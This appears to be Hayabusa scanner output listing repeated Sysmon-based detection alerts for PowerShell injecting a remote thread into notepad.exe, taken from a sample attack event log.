2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.333 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.411 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.458 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.473 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.630 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.692 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.723 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.739 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.755 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
